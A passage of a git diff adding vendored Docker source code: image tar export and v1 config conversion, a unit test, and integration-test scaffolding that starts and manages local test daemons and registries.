+ + if oldPath, exists := s.diffIDPaths[l.DiffID()]; exists { + relPath, err := filepath.Rel(outDir, oldPath) + if err != nil { + return distribution.Descriptor{}, err + } + os.Symlink(relPath, layerPath) + } else { + // Use system.CreateSequential rather than os.Create. This ensures sequential + // file access on Windows to avoid eating into MM standby list. + // On Linux, this equates to a regular os.Create. 
+ tarFile, err := system.CreateSequential(layerPath) + if err != nil { + return distribution.Descriptor{}, err + } + defer tarFile.Close() + + arch, err := l.TarStream() + if err != nil { + return distribution.Descriptor{}, err + } + defer arch.Close() + + if _, err := io.Copy(tarFile, arch); err != nil { + return distribution.Descriptor{}, err + } + + for _, fname := range []string{"", legacyVersionFileName, legacyConfigFileName, legacyLayerFileName} { + // todo: maybe save layer created timestamp? + if err := system.Chtimes(filepath.Join(outDir, fname), createdTime, createdTime); err != nil { + return distribution.Descriptor{}, err + } + } + + s.diffIDPaths[l.DiffID()] = layerPath + } + s.savedLayers[legacyImg.ID] = struct{}{} + + var src distribution.Descriptor + if fs, ok := l.(distribution.Describable); ok { + src = fs.Descriptor() + } + return src, nil +} diff --git a/vendor/github.com/docker/docker/image/tarexport/tarexport.go b/vendor/github.com/docker/docker/image/tarexport/tarexport.go new file mode 100644 index 0000000000..c0be95480e --- /dev/null +++ b/vendor/github.com/docker/docker/image/tarexport/tarexport.go @@ -0,0 +1,47 @@ +package tarexport + +import ( + "github.com/docker/distribution" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" + "github.com/docker/docker/reference" +) + +const ( + manifestFileName = "manifest.json" + legacyLayerFileName = "layer.tar" + legacyConfigFileName = "json" + legacyVersionFileName = "VERSION" + legacyRepositoriesFileName = "repositories" +) + +type manifestItem struct { + Config string + RepoTags []string + Layers []string + Parent image.ID `json:",omitempty"` + LayerSources map[layer.DiffID]distribution.Descriptor `json:",omitempty"` +} + +type tarexporter struct { + is image.Store + ls layer.Store + rs reference.Store + loggerImgEvent LogImageEvent +} + +// LogImageEvent defines interface for event generation related to image tar(load and save) operations +type LogImageEvent interface { + 
//LogImageEvent generates an event related to an image operation + LogImageEvent(imageID, refName, action string) +} + +// NewTarExporter returns new ImageExporter for tar packages +func NewTarExporter(is image.Store, ls layer.Store, rs reference.Store, loggerImgEvent LogImageEvent) image.Exporter { + return &tarexporter{ + is: is, + ls: ls, + rs: rs, + loggerImgEvent: loggerImgEvent, + } +} diff --git a/vendor/github.com/docker/docker/image/v1/imagev1.go b/vendor/github.com/docker/docker/image/v1/imagev1.go new file mode 100644 index 0000000000..d498ddbc00 --- /dev/null +++ b/vendor/github.com/docker/docker/image/v1/imagev1.go @@ -0,0 +1,156 @@ +package v1 + +import ( + "encoding/json" + "fmt" + "reflect" + "regexp" + "strings" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/image" + "github.com/docker/docker/layer" +) + +var validHex = regexp.MustCompile(`^([a-f0-9]{64})$`) + +// noFallbackMinVersion is the minimum version for which v1compatibility +// information will not be marshaled through the Image struct to remove +// blank fields. +var noFallbackMinVersion = "1.8.3" + +// HistoryFromConfig creates a History struct from v1 configuration JSON +func HistoryFromConfig(imageJSON []byte, emptyLayer bool) (image.History, error) { + h := image.History{} + var v1Image image.V1Image + if err := json.Unmarshal(imageJSON, &v1Image); err != nil { + return h, err + } + + return image.History{ + Author: v1Image.Author, + Created: v1Image.Created, + CreatedBy: strings.Join(v1Image.ContainerConfig.Cmd, " "), + Comment: v1Image.Comment, + EmptyLayer: emptyLayer, + }, nil +} + +// CreateID creates an ID from v1 image, layerID and parent ID. +// Used for backwards compatibility with old clients. 
+func CreateID(v1Image image.V1Image, layerID layer.ChainID, parent digest.Digest) (digest.Digest, error) { + v1Image.ID = "" + v1JSON, err := json.Marshal(v1Image) + if err != nil { + return "", err + } + + var config map[string]*json.RawMessage + if err := json.Unmarshal(v1JSON, &config); err != nil { + return "", err + } + + // FIXME: note that this is slightly incompatible with RootFS logic + config["layer_id"] = rawJSON(layerID) + if parent != "" { + config["parent"] = rawJSON(parent) + } + + configJSON, err := json.Marshal(config) + if err != nil { + return "", err + } + logrus.Debugf("CreateV1ID %s", configJSON) + + return digest.FromBytes(configJSON), nil +} + +// MakeConfigFromV1Config creates an image config from the legacy V1 config format. +func MakeConfigFromV1Config(imageJSON []byte, rootfs *image.RootFS, history []image.History) ([]byte, error) { + var dver struct { + DockerVersion string `json:"docker_version"` + } + + if err := json.Unmarshal(imageJSON, &dver); err != nil { + return nil, err + } + + useFallback := versions.LessThan(dver.DockerVersion, noFallbackMinVersion) + + if useFallback { + var v1Image image.V1Image + err := json.Unmarshal(imageJSON, &v1Image) + if err != nil { + return nil, err + } + imageJSON, err = json.Marshal(v1Image) + if err != nil { + return nil, err + } + } + + var c map[string]*json.RawMessage + if err := json.Unmarshal(imageJSON, &c); err != nil { + return nil, err + } + + delete(c, "id") + delete(c, "parent") + delete(c, "Size") // Size is calculated from data on disk and is inconsistent + delete(c, "parent_id") + delete(c, "layer_id") + delete(c, "throwaway") + + c["rootfs"] = rawJSON(rootfs) + c["history"] = rawJSON(history) + + return json.Marshal(c) +} + +// MakeV1ConfigFromConfig creates an legacy V1 image config from an Image struct +func MakeV1ConfigFromConfig(img *image.Image, v1ID, parentV1ID string, throwaway bool) ([]byte, error) { + // Top-level v1compatibility string should be a modified version of the 
+ // image config. + var configAsMap map[string]*json.RawMessage + if err := json.Unmarshal(img.RawJSON(), &configAsMap); err != nil { + return nil, err + } + + // Delete fields that didn't exist in old manifest + imageType := reflect.TypeOf(img).Elem() + for i := 0; i < imageType.NumField(); i++ { + f := imageType.Field(i) + jsonName := strings.Split(f.Tag.Get("json"), ",")[0] + // Parent is handled specially below. + if jsonName != "" && jsonName != "parent" { + delete(configAsMap, jsonName) + } + } + configAsMap["id"] = rawJSON(v1ID) + if parentV1ID != "" { + configAsMap["parent"] = rawJSON(parentV1ID) + } + if throwaway { + configAsMap["throwaway"] = rawJSON(true) + } + + return json.Marshal(configAsMap) +} + +func rawJSON(value interface{}) *json.RawMessage { + jsonval, err := json.Marshal(value) + if err != nil { + return nil + } + return (*json.RawMessage)(&jsonval) +} + +// ValidateID checks whether an ID string is a valid image ID. +func ValidateID(id string) error { + if ok := validHex.MatchString(id); !ok { + return fmt.Errorf("image ID %q is invalid", id) + } + return nil +} diff --git a/vendor/github.com/docker/docker/image/v1/imagev1_test.go b/vendor/github.com/docker/docker/image/v1/imagev1_test.go new file mode 100644 index 0000000000..936c55e4c5 --- /dev/null +++ b/vendor/github.com/docker/docker/image/v1/imagev1_test.go @@ -0,0 +1,55 @@ +package v1 + +import ( + "encoding/json" + "testing" + + "github.com/docker/docker/image" +) + +func TestMakeV1ConfigFromConfig(t *testing.T) { + img := &image.Image{ + V1Image: image.V1Image{ + ID: "v2id", + Parent: "v2parent", + OS: "os", + }, + OSVersion: "osversion", + RootFS: &image.RootFS{ + Type: "layers", + }, + } + v2js, err := json.Marshal(img) + if err != nil { + t.Fatal(err) + } + + // Convert the image back in order to get RawJSON() support. 
+ img, err = image.NewFromJSON(v2js) + if err != nil { + t.Fatal(err) + } + + js, err := MakeV1ConfigFromConfig(img, "v1id", "v1parent", false) + if err != nil { + t.Fatal(err) + } + + newimg := &image.Image{} + err = json.Unmarshal(js, newimg) + if err != nil { + t.Fatal(err) + } + + if newimg.V1Image.ID != "v1id" || newimg.Parent != "v1parent" { + t.Error("ids should have changed", newimg.V1Image.ID, newimg.V1Image.Parent) + } + + if newimg.RootFS != nil { + t.Error("rootfs should have been removed") + } + + if newimg.V1Image.OS != "os" { + t.Error("os should have been preserved") + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/benchmark_test.go b/vendor/github.com/docker/docker/integration-cli/benchmark_test.go new file mode 100644 index 0000000000..b87e131b7e --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/benchmark_test.go @@ -0,0 +1,95 @@ +package main + +import ( + "fmt" + "io/ioutil" + "os" + "runtime" + "strings" + "sync" + + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) BenchmarkConcurrentContainerActions(c *check.C) { + maxConcurrency := runtime.GOMAXPROCS(0) + numIterations := c.N + outerGroup := &sync.WaitGroup{} + outerGroup.Add(maxConcurrency) + chErr := make(chan error, numIterations*2*maxConcurrency) + + for i := 0; i < maxConcurrency; i++ { + go func() { + defer outerGroup.Done() + innerGroup := &sync.WaitGroup{} + innerGroup.Add(2) + + go func() { + defer innerGroup.Done() + for i := 0; i < numIterations; i++ { + args := []string{"run", "-d", defaultSleepImage} + args = append(args, sleepCommandForDaemonPlatform()...) + out, _, err := dockerCmdWithError(args...) 
+ if err != nil { + chErr <- fmt.Errorf(out) + return + } + + id := strings.TrimSpace(out) + tmpDir, err := ioutil.TempDir("", "docker-concurrent-test-"+id) + if err != nil { + chErr <- err + return + } + defer os.RemoveAll(tmpDir) + out, _, err = dockerCmdWithError("cp", id+":/tmp", tmpDir) + if err != nil { + chErr <- fmt.Errorf(out) + return + } + + out, _, err = dockerCmdWithError("kill", id) + if err != nil { + chErr <- fmt.Errorf(out) + } + + out, _, err = dockerCmdWithError("start", id) + if err != nil { + chErr <- fmt.Errorf(out) + } + + out, _, err = dockerCmdWithError("kill", id) + if err != nil { + chErr <- fmt.Errorf(out) + } + + // don't do an rm -f here since it can potentially ignore errors from the graphdriver + out, _, err = dockerCmdWithError("rm", id) + if err != nil { + chErr <- fmt.Errorf(out) + } + } + }() + + go func() { + defer innerGroup.Done() + for i := 0; i < numIterations; i++ { + out, _, err := dockerCmdWithError("ps") + if err != nil { + chErr <- fmt.Errorf(out) + } + } + }() + + innerGroup.Wait() + }() + } + + outerGroup.Wait() + close(chErr) + + for err := range chErr { + c.Assert(err, checker.IsNil) + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/check_test.go b/vendor/github.com/docker/docker/integration-cli/check_test.go new file mode 100644 index 0000000000..7084d6f8af --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/check_test.go @@ -0,0 +1,383 @@ +package main + +import ( + "fmt" + "net/http/httptest" + "os" + "path/filepath" + "sync" + "syscall" + "testing" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/cliconfig" + "github.com/docker/docker/pkg/reexec" + "github.com/go-check/check" +) + +func Test(t *testing.T) { + reexec.Init() // This is required for external graphdriver tests + + if !isLocalDaemon { + fmt.Println("INFO: Testing against a remote daemon") + } else { + fmt.Println("INFO: Testing against a local daemon") + } + + if daemonPlatform == "linux" { 
+ ensureFrozenImagesLinux(t) + } + check.TestingT(t) +} + +func init() { + check.Suite(&DockerSuite{}) +} + +type DockerSuite struct { +} + +func (s *DockerSuite) OnTimeout(c *check.C) { + if daemonPid > 0 && isLocalDaemon { + signalDaemonDump(daemonPid) + } +} + +func (s *DockerSuite) TearDownTest(c *check.C) { + unpauseAllContainers() + deleteAllContainers() + deleteAllImages() + deleteAllVolumes() + deleteAllNetworks() + deleteAllPlugins() +} + +func init() { + check.Suite(&DockerRegistrySuite{ + ds: &DockerSuite{}, + }) +} + +type DockerRegistrySuite struct { + ds *DockerSuite + reg *testRegistryV2 + d *Daemon +} + +func (s *DockerRegistrySuite) OnTimeout(c *check.C) { + s.d.DumpStackAndQuit() +} + +func (s *DockerRegistrySuite) SetUpTest(c *check.C) { + testRequires(c, DaemonIsLinux, RegistryHosting) + s.reg = setupRegistry(c, false, "", "") + s.d = NewDaemon(c) +} + +func (s *DockerRegistrySuite) TearDownTest(c *check.C) { + if s.reg != nil { + s.reg.Close() + } + if s.d != nil { + s.d.Stop() + } + s.ds.TearDownTest(c) +} + +func init() { + check.Suite(&DockerSchema1RegistrySuite{ + ds: &DockerSuite{}, + }) +} + +type DockerSchema1RegistrySuite struct { + ds *DockerSuite + reg *testRegistryV2 + d *Daemon +} + +func (s *DockerSchema1RegistrySuite) OnTimeout(c *check.C) { + s.d.DumpStackAndQuit() +} + +func (s *DockerSchema1RegistrySuite) SetUpTest(c *check.C) { + testRequires(c, DaemonIsLinux, RegistryHosting, NotArm64) + s.reg = setupRegistry(c, true, "", "") + s.d = NewDaemon(c) +} + +func (s *DockerSchema1RegistrySuite) TearDownTest(c *check.C) { + if s.reg != nil { + s.reg.Close() + } + if s.d != nil { + s.d.Stop() + } + s.ds.TearDownTest(c) +} + +func init() { + check.Suite(&DockerRegistryAuthHtpasswdSuite{ + ds: &DockerSuite{}, + }) +} + +type DockerRegistryAuthHtpasswdSuite struct { + ds *DockerSuite + reg *testRegistryV2 + d *Daemon +} + +func (s *DockerRegistryAuthHtpasswdSuite) OnTimeout(c *check.C) { + s.d.DumpStackAndQuit() +} + +func (s 
*DockerRegistryAuthHtpasswdSuite) SetUpTest(c *check.C) { + testRequires(c, DaemonIsLinux, RegistryHosting) + s.reg = setupRegistry(c, false, "htpasswd", "") + s.d = NewDaemon(c) +} + +func (s *DockerRegistryAuthHtpasswdSuite) TearDownTest(c *check.C) { + if s.reg != nil { + out, err := s.d.Cmd("logout", privateRegistryURL) + c.Assert(err, check.IsNil, check.Commentf(out)) + s.reg.Close() + } + if s.d != nil { + s.d.Stop() + } + s.ds.TearDownTest(c) +} + +func init() { + check.Suite(&DockerRegistryAuthTokenSuite{ + ds: &DockerSuite{}, + }) +} + +type DockerRegistryAuthTokenSuite struct { + ds *DockerSuite + reg *testRegistryV2 + d *Daemon +} + +func (s *DockerRegistryAuthTokenSuite) OnTimeout(c *check.C) { + s.d.DumpStackAndQuit() +} + +func (s *DockerRegistryAuthTokenSuite) SetUpTest(c *check.C) { + testRequires(c, DaemonIsLinux, RegistryHosting) + s.d = NewDaemon(c) +} + +func (s *DockerRegistryAuthTokenSuite) TearDownTest(c *check.C) { + if s.reg != nil { + out, err := s.d.Cmd("logout", privateRegistryURL) + c.Assert(err, check.IsNil, check.Commentf(out)) + s.reg.Close() + } + if s.d != nil { + s.d.Stop() + } + s.ds.TearDownTest(c) +} + +func (s *DockerRegistryAuthTokenSuite) setupRegistryWithTokenService(c *check.C, tokenURL string) { + if s == nil { + c.Fatal("registry suite isn't initialized") + } + s.reg = setupRegistry(c, false, "token", tokenURL) +} + +func init() { + check.Suite(&DockerDaemonSuite{ + ds: &DockerSuite{}, + }) +} + +type DockerDaemonSuite struct { + ds *DockerSuite + d *Daemon +} + +func (s *DockerDaemonSuite) OnTimeout(c *check.C) { + s.d.DumpStackAndQuit() +} + +func (s *DockerDaemonSuite) SetUpTest(c *check.C) { + testRequires(c, DaemonIsLinux) + s.d = NewDaemon(c) +} + +func (s *DockerDaemonSuite) TearDownTest(c *check.C) { + testRequires(c, DaemonIsLinux) + if s.d != nil { + s.d.Stop() + } + s.ds.TearDownTest(c) +} + +func (s *DockerDaemonSuite) TearDownSuite(c *check.C) { + filepath.Walk(daemonSockRoot, func(path string, fi 
os.FileInfo, err error) error { + if err != nil { + // ignore errors here + // not cleaning up sockets is not really an error + return nil + } + if fi.Mode() == os.ModeSocket { + syscall.Unlink(path) + } + return nil + }) + os.RemoveAll(daemonSockRoot) +} + +const defaultSwarmPort = 2477 + +func init() { + check.Suite(&DockerSwarmSuite{ + ds: &DockerSuite{}, + }) +} + +type DockerSwarmSuite struct { + server *httptest.Server + ds *DockerSuite + daemons []*SwarmDaemon + daemonsLock sync.Mutex // protect access to daemons + portIndex int +} + +func (s *DockerSwarmSuite) OnTimeout(c *check.C) { + s.daemonsLock.Lock() + defer s.daemonsLock.Unlock() + for _, d := range s.daemons { + d.DumpStackAndQuit() + } +} + +func (s *DockerSwarmSuite) SetUpTest(c *check.C) { + testRequires(c, DaemonIsLinux) +} + +func (s *DockerSwarmSuite) AddDaemon(c *check.C, joinSwarm, manager bool) *SwarmDaemon { + d := &SwarmDaemon{ + Daemon: NewDaemon(c), + port: defaultSwarmPort + s.portIndex, + } + d.listenAddr = fmt.Sprintf("0.0.0.0:%d", d.port) + args := []string{"--iptables=false", "--swarm-default-advertise-addr=lo"} // avoid networking conflicts + if experimentalDaemon { + args = append(args, "--experimental") + } + err := d.StartWithBusybox(args...) 
+ c.Assert(err, check.IsNil) + + if joinSwarm == true { + if len(s.daemons) > 0 { + tokens := s.daemons[0].joinTokens(c) + token := tokens.Worker + if manager { + token = tokens.Manager + } + c.Assert(d.Join(swarm.JoinRequest{ + RemoteAddrs: []string{s.daemons[0].listenAddr}, + JoinToken: token, + }), check.IsNil) + } else { + c.Assert(d.Init(swarm.InitRequest{}), check.IsNil) + } + } + + s.portIndex++ + s.daemonsLock.Lock() + s.daemons = append(s.daemons, d) + s.daemonsLock.Unlock() + + return d +} + +func (s *DockerSwarmSuite) TearDownTest(c *check.C) { + testRequires(c, DaemonIsLinux) + s.daemonsLock.Lock() + for _, d := range s.daemons { + d.Stop() + // raft state file is quite big (64MB) so remove it after every test + walDir := filepath.Join(d.root, "swarm/raft/wal") + if err := os.RemoveAll(walDir); err != nil { + c.Logf("error removing %v: %v", walDir, err) + } + + cleanupExecRoot(c, d.execRoot) + } + s.daemons = nil + s.daemonsLock.Unlock() + + s.portIndex = 0 + s.ds.TearDownTest(c) +} + +func init() { + check.Suite(&DockerTrustSuite{ + ds: &DockerSuite{}, + }) +} + +type DockerTrustSuite struct { + ds *DockerSuite + reg *testRegistryV2 + not *testNotary +} + +func (s *DockerTrustSuite) SetUpTest(c *check.C) { + testRequires(c, RegistryHosting, NotaryServerHosting) + s.reg = setupRegistry(c, false, "", "") + s.not = setupNotary(c) +} + +func (s *DockerTrustSuite) TearDownTest(c *check.C) { + if s.reg != nil { + s.reg.Close() + } + if s.not != nil { + s.not.Close() + } + + // Remove trusted keys and metadata after test + os.RemoveAll(filepath.Join(cliconfig.ConfigDir(), "trust")) + s.ds.TearDownTest(c) +} + +func init() { + ds := &DockerSuite{} + check.Suite(&DockerTrustedSwarmSuite{ + trustSuite: DockerTrustSuite{ + ds: ds, + }, + swarmSuite: DockerSwarmSuite{ + ds: ds, + }, + }) +} + +type DockerTrustedSwarmSuite struct { + swarmSuite DockerSwarmSuite + trustSuite DockerTrustSuite + reg *testRegistryV2 + not *testNotary +} + +func (s 
*DockerTrustedSwarmSuite) SetUpTest(c *check.C) { + s.swarmSuite.SetUpTest(c) + s.trustSuite.SetUpTest(c) +} + +func (s *DockerTrustedSwarmSuite) TearDownTest(c *check.C) { + s.trustSuite.TearDownTest(c) + s.swarmSuite.TearDownTest(c) +} + +func (s *DockerTrustedSwarmSuite) OnTimeout(c *check.C) { + s.swarmSuite.OnTimeout(c) +} diff --git a/vendor/github.com/docker/docker/integration-cli/daemon.go b/vendor/github.com/docker/docker/integration-cli/daemon.go new file mode 100644 index 0000000000..9fd3f1e82d --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/daemon.go @@ -0,0 +1,608 @@ +package main + +import ( + "bytes" + "encoding/json" + "errors" + "fmt" + "io" + "net/http" + "os" + "os/exec" + "path/filepath" + "strconv" + "strings" + "time" + + "github.com/docker/docker/api/types/events" + "github.com/docker/docker/opts" + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/go-connections/sockets" + "github.com/docker/go-connections/tlsconfig" + "github.com/go-check/check" +) + +var daemonSockRoot = filepath.Join(os.TempDir(), "docker-integration") + +// Daemon represents a Docker daemon for the testing framework. +type Daemon struct { + GlobalFlags []string + + id string + c *check.C + logFile *os.File + folder string + root string + stdin io.WriteCloser + stdout, stderr io.ReadCloser + cmd *exec.Cmd + storageDriver string + wait chan error + userlandProxy bool + useDefaultHost bool + useDefaultTLSHost bool + execRoot string +} + +type clientConfig struct { + transport *http.Transport + scheme string + addr string +} + +// NewDaemon returns a Daemon instance to be used for testing. +// This will create a directory such as d123456789 in the folder specified by $DEST. +// The daemon will not automatically start. 
+func NewDaemon(c *check.C) *Daemon { + dest := os.Getenv("DEST") + c.Assert(dest, check.Not(check.Equals), "", check.Commentf("Please set the DEST environment variable")) + + err := os.MkdirAll(daemonSockRoot, 0700) + c.Assert(err, checker.IsNil, check.Commentf("could not create daemon socket root")) + + id := fmt.Sprintf("d%s", stringid.TruncateID(stringid.GenerateRandomID())) + dir := filepath.Join(dest, id) + daemonFolder, err := filepath.Abs(dir) + c.Assert(err, check.IsNil, check.Commentf("Could not make %q an absolute path", dir)) + daemonRoot := filepath.Join(daemonFolder, "root") + + c.Assert(os.MkdirAll(daemonRoot, 0755), check.IsNil, check.Commentf("Could not create daemon root %q", dir)) + + userlandProxy := true + if env := os.Getenv("DOCKER_USERLANDPROXY"); env != "" { + if val, err := strconv.ParseBool(env); err != nil { + userlandProxy = val + } + } + + return &Daemon{ + id: id, + c: c, + folder: daemonFolder, + root: daemonRoot, + storageDriver: os.Getenv("DOCKER_GRAPHDRIVER"), + userlandProxy: userlandProxy, + execRoot: filepath.Join(os.TempDir(), "docker-execroot", id), + } +} + +// RootDir returns the root directory of the daemon. 
+func (d *Daemon) RootDir() string { + return d.root +} + +func (d *Daemon) getClientConfig() (*clientConfig, error) { + var ( + transport *http.Transport + scheme string + addr string + proto string + ) + if d.useDefaultTLSHost { + option := &tlsconfig.Options{ + CAFile: "fixtures/https/ca.pem", + CertFile: "fixtures/https/client-cert.pem", + KeyFile: "fixtures/https/client-key.pem", + } + tlsConfig, err := tlsconfig.Client(*option) + if err != nil { + return nil, err + } + transport = &http.Transport{ + TLSClientConfig: tlsConfig, + } + addr = fmt.Sprintf("%s:%d", opts.DefaultHTTPHost, opts.DefaultTLSHTTPPort) + scheme = "https" + proto = "tcp" + } else if d.useDefaultHost { + addr = opts.DefaultUnixSocket + proto = "unix" + scheme = "http" + transport = &http.Transport{} + } else { + addr = d.sockPath() + proto = "unix" + scheme = "http" + transport = &http.Transport{} + } + + d.c.Assert(sockets.ConfigureTransport(transport, proto, addr), check.IsNil) + + return &clientConfig{ + transport: transport, + scheme: scheme, + addr: addr, + }, nil +} + +// Start will start the daemon and return once it is ready to receive requests. +// You can specify additional daemon flags. +func (d *Daemon) Start(args ...string) error { + logFile, err := os.OpenFile(filepath.Join(d.folder, "docker.log"), os.O_RDWR|os.O_CREATE|os.O_APPEND, 0600) + d.c.Assert(err, check.IsNil, check.Commentf("[%s] Could not create %s/docker.log", d.id, d.folder)) + + return d.StartWithLogFile(logFile, args...) +} + +// StartWithLogFile will start the daemon and attach its streams to a given file. 
+func (d *Daemon) StartWithLogFile(out *os.File, providedArgs ...string) error { + dockerdBinary, err := exec.LookPath(dockerdBinary) + d.c.Assert(err, check.IsNil, check.Commentf("[%s] could not find docker binary in $PATH", d.id)) + + args := append(d.GlobalFlags, + "--containerd", "/var/run/docker/libcontainerd/docker-containerd.sock", + "--graph", d.root, + "--exec-root", d.execRoot, + "--pidfile", fmt.Sprintf("%s/docker.pid", d.folder), + fmt.Sprintf("--userland-proxy=%t", d.userlandProxy), + ) + if experimentalDaemon { + args = append(args, "--experimental", "--init") + } + if !(d.useDefaultHost || d.useDefaultTLSHost) { + args = append(args, []string{"--host", d.sock()}...) + } + if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" { + args = append(args, []string{"--userns-remap", root}...) + } + + // If we don't explicitly set the log-level or debug flag(-D) then + // turn on debug mode + foundLog := false + foundSd := false + for _, a := range providedArgs { + if strings.Contains(a, "--log-level") || strings.Contains(a, "-D") || strings.Contains(a, "--debug") { + foundLog = true + } + if strings.Contains(a, "--storage-driver") { + foundSd = true + } + } + if !foundLog { + args = append(args, "--debug") + } + if d.storageDriver != "" && !foundSd { + args = append(args, "--storage-driver", d.storageDriver) + } + + args = append(args, providedArgs...) + d.cmd = exec.Command(dockerdBinary, args...) 
+ d.cmd.Env = append(os.Environ(), "DOCKER_SERVICE_PREFER_OFFLINE_IMAGE=1") + d.cmd.Stdout = out + d.cmd.Stderr = out + d.logFile = out + + if err := d.cmd.Start(); err != nil { + return fmt.Errorf("[%s] could not start daemon container: %v", d.id, err) + } + + wait := make(chan error) + + go func() { + wait <- d.cmd.Wait() + d.c.Logf("[%s] exiting daemon", d.id) + close(wait) + }() + + d.wait = wait + + tick := time.Tick(500 * time.Millisecond) + // make sure daemon is ready to receive requests + startTime := time.Now().Unix() + for { + d.c.Logf("[%s] waiting for daemon to start", d.id) + if time.Now().Unix()-startTime > 5 { + // After 5 seconds, give up + return fmt.Errorf("[%s] Daemon exited and never started", d.id) + } + select { + case <-time.After(2 * time.Second): + return fmt.Errorf("[%s] timeout: daemon does not respond", d.id) + case <-tick: + clientConfig, err := d.getClientConfig() + if err != nil { + return err + } + + client := &http.Client{ + Transport: clientConfig.transport, + } + + req, err := http.NewRequest("GET", "/_ping", nil) + d.c.Assert(err, check.IsNil, check.Commentf("[%s] could not create new request", d.id)) + req.URL.Host = clientConfig.addr + req.URL.Scheme = clientConfig.scheme + resp, err := client.Do(req) + if err != nil { + continue + } + if resp.StatusCode != http.StatusOK { + d.c.Logf("[%s] received status != 200 OK: %s", d.id, resp.Status) + } + d.c.Logf("[%s] daemon started", d.id) + d.root, err = d.queryRootDir() + if err != nil { + return fmt.Errorf("[%s] error querying daemon for root directory: %v", d.id, err) + } + return nil + case <-d.wait: + return fmt.Errorf("[%s] Daemon exited during startup", d.id) + } + } +} + +// StartWithBusybox will first start the daemon with Daemon.Start() +// then save the busybox image from the main daemon and load it into this Daemon instance. 
+func (d *Daemon) StartWithBusybox(arg ...string) error { + if err := d.Start(arg...); err != nil { + return err + } + return d.LoadBusybox() +} + +// Kill will send a SIGKILL to the daemon +func (d *Daemon) Kill() error { + if d.cmd == nil || d.wait == nil { + return errors.New("daemon not started") + } + + defer func() { + d.logFile.Close() + d.cmd = nil + }() + + if err := d.cmd.Process.Kill(); err != nil { + d.c.Logf("Could not kill daemon: %v", err) + return err + } + + if err := os.Remove(fmt.Sprintf("%s/docker.pid", d.folder)); err != nil { + return err + } + + return nil +} + +// DumpStackAndQuit sends SIGQUIT to the daemon, which triggers it to dump its +// stack to its log file and exit +// This is used primarily for gathering debug information on test timeout +func (d *Daemon) DumpStackAndQuit() { + if d.cmd == nil || d.cmd.Process == nil { + return + } + signalDaemonDump(d.cmd.Process.Pid) +} + +// Stop will send a SIGINT every second and wait for the daemon to stop. +// If it timeouts, a SIGKILL is sent. +// Stop will not delete the daemon directory. If a purged daemon is needed, +// instantiate a new one with NewDaemon. 
+func (d *Daemon) Stop() error { + if d.cmd == nil || d.wait == nil { + return errors.New("daemon not started") + } + + defer func() { + d.logFile.Close() + d.cmd = nil + }() + + i := 1 + tick := time.Tick(time.Second) + + if err := d.cmd.Process.Signal(os.Interrupt); err != nil { + return fmt.Errorf("could not send signal: %v", err) + } +out1: + for { + select { + case err := <-d.wait: + return err + case <-time.After(20 * time.Second): + // time for stopping jobs and run onShutdown hooks + d.c.Logf("timeout: %v", d.id) + break out1 + } + } + +out2: + for { + select { + case err := <-d.wait: + return err + case <-tick: + i++ + if i > 5 { + d.c.Logf("tried to interrupt daemon for %d times, now try to kill it", i) + break out2 + } + d.c.Logf("Attempt #%d: daemon is still running with pid %d", i, d.cmd.Process.Pid) + if err := d.cmd.Process.Signal(os.Interrupt); err != nil { + return fmt.Errorf("could not send signal: %v", err) + } + } + } + + if err := d.cmd.Process.Kill(); err != nil { + d.c.Logf("Could not kill daemon: %v", err) + return err + } + + if err := os.Remove(fmt.Sprintf("%s/docker.pid", d.folder)); err != nil { + return err + } + + return nil +} + +// Restart will restart the daemon by first stopping it and then starting it. +func (d *Daemon) Restart(arg ...string) error { + d.Stop() + // in the case of tests running a user namespace-enabled daemon, we have resolved + // d.root to be the actual final path of the graph dir after the "uid.gid" of + // remapped root is added--we need to subtract it from the path before calling + // start or else we will continue making subdirectories rather than truly restarting + // with the same location/root: + if root := os.Getenv("DOCKER_REMAP_ROOT"); root != "" { + d.root = filepath.Dir(d.root) + } + return d.Start(arg...) 
+} + +// LoadBusybox will load the stored busybox into a newly started daemon +func (d *Daemon) LoadBusybox() error { + bb := filepath.Join(d.folder, "busybox.tar") + if _, err := os.Stat(bb); err != nil { + if !os.IsNotExist(err) { + return fmt.Errorf("unexpected error on busybox.tar stat: %v", err) + } + // saving busybox image from main daemon + if out, err := exec.Command(dockerBinary, "save", "--output", bb, "busybox:latest").CombinedOutput(); err != nil { + imagesOut, _ := exec.Command(dockerBinary, "images", "--format", "{{ .Repository }}:{{ .Tag }}").CombinedOutput() + return fmt.Errorf("could not save busybox image: %s\n%s", string(out), strings.TrimSpace(string(imagesOut))) + } + } + // loading busybox image to this daemon + if out, err := d.Cmd("load", "--input", bb); err != nil { + return fmt.Errorf("could not load busybox image: %s", out) + } + if err := os.Remove(bb); err != nil { + d.c.Logf("could not remove %s: %v", bb, err) + } + return nil +} + +func (d *Daemon) queryRootDir() (string, error) { + // update daemon root by asking /info endpoint (to support user + // namespaced daemon with root remapped uid.gid directory) + clientConfig, err := d.getClientConfig() + if err != nil { + return "", err + } + + client := &http.Client{ + Transport: clientConfig.transport, + } + + req, err := http.NewRequest("GET", "/info", nil) + if err != nil { + return "", err + } + req.Header.Set("Content-Type", "application/json") + req.URL.Host = clientConfig.addr + req.URL.Scheme = clientConfig.scheme + + resp, err := client.Do(req) + if err != nil { + return "", err + } + body := ioutils.NewReadCloserWrapper(resp.Body, func() error { + return resp.Body.Close() + }) + + type Info struct { + DockerRootDir string + } + var b []byte + var i Info + b, err = readBody(body) + if err == nil && resp.StatusCode == http.StatusOK { + // read the docker root dir + if err = json.Unmarshal(b, &i); err == nil { + return i.DockerRootDir, nil + } + } + return "", err +} + +func (d 
